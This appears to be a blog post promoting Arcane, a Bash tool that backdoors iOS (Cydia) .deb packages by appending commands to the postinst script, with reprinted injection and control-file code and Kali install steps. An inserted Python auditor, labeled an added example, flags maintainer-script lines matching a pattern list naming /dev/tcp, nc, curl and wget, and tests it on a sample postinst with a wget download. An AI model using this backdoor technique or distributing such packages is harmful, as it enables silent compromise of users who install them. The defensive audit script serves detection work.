Arcane is a simple script tool to backdoor iOS packages (iPhone ARM) and create the necessary resources for APT repositories.
It was created to help illustrate why Cydia repositories can be dangerous and what post-exploitation attacks are possible from a compromised iOS device.
How Arcane Tool To Backdoor iOS Package Works
It’s possible to supply scripts as part of a package when installing or removing applications. Package maintainer scripts include the preinst, postinst, prerm, and postrm files. Arcane takes advantage of the postinst file to execute commands during the installation.
```bash
# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor ()
{
    # If --file is used, `cat` the command(s) into the postinst file.
    if [[ "$infile" ]]; then
        cat "$infile" >> "$postinst";
        embed="[$infile]";
    else
        # If no --file, utilize the simple Bash payload, previously
        # defined.
        echo -e "$payload" >> "$postinst";
        embed="generic shell command";
    fi;
    status "embedded $embed into postinst" "error embedding backdoor";
    chmod 0755 "$postinst"
};
```
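Because the maintainer scripts sit in the package's control archive, they can be read out of a .deb and reviewed without installing or executing anything. The following is an added example, not part of Arcane or the original article: it parses the ar container, opens `control.tar.*`, and reports lines in any maintainer script that match a short heuristic pattern list. The function names, the pattern list and the sample package are assumptions constructed for illustration.

```python
import io, re, tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Heuristic patterns (an assumption, not a complete ruleset) for network use in a script.
SUSPICIOUS = re.compile(
    rb"/dev/(tcp|udp)/|\b(nc|ncat|netcat|curl|wget|mkfifo)\b|base64\s+(-d|--decode)")

def ar_members(data):
    """Yield (name, body) for each member of an ar archive (the .deb container)."""
    if data[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(data):
        hdr = data[pos:pos + 60]        # name[16] mtime[12] uid[6] gid[6] mode[8] size[10] magic[2]
        name = hdr[:16].decode().strip().rstrip("/")
        size = int(hdr[48:58].decode().strip())
        yield name, data[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)   # members are 2-byte aligned

def audit_deb(data):
    """Return {script: [suspicious lines]} for every maintainer script in a .deb."""
    findings = {}
    for name, body in ar_members(data):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(body), mode="r:*") as tar:
            for member in tar.getmembers():
                script = member.name.rsplit("/", 1)[-1]
                if member.isfile() and script in MAINTAINER_SCRIPTS:
                    lines = tar.extractfile(member).read().splitlines()
                    findings[script] = [l.decode(errors="replace")
                                        for l in lines if SUSPICIOUS.search(l)]
    return findings

def build_sample_deb(postinst):
    """Constructed input: a minimal .deb that carries only a postinst script."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo("./postinst")
        info.size, info.mode = len(postinst), 0o755
        tar.addfile(info, io.BytesIO(postinst))
    deb = b"!<arch>\n"
    for name, body in (("debian-binary", b"2.0\n"), ("control.tar.gz", buf.getvalue())):
        deb += f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(body):<10}`\n".encode()
        deb += body + (b"\n" if len(body) % 2 else b"")
    return deb

if __name__ == "__main__":
    print(audit_deb(build_sample_deb(b"#!/bin/sh\nwget -q http://example.invalid/a -O /tmp/a\n")))
```

An empty list for a script means it exists but matched none of the patterns; any maintainer script in a package from an untrusted repository still deserves a manual read.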
The control file contains values that package management tools use when installing packages. Arcane will either modify an existing control or create it.
```bash
# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
    # If no control is detected, create it using the template.
    echo "$controlTemp" > "$tmp/DEBIAN/control";
    status "created control file" "error with control template";
else
    # If a control file exists, Arcane will simply rename the package
    # as it appears in the list of available Cydia applications. This
    # makes the package easier to locate in Cydia.
    msg "detected control file" succ;
    sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
    status "modified control file" "error with control";
fi;
```
How to install Arcane Tool To Backdoor iOS Packages
Recommended for Kali v2020.3:
```bash
sudo apt-get update; sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils # dependencies
sudo git clone https://github.com/tokyoneon/arcane /opt/arcane
sudo chown $USER:$USER -R /opt/arcane/; cd /opt/arcane
chmod +x arcane.sh;./arcane.sh --help
```
You can download Arcane here:
Or read more here.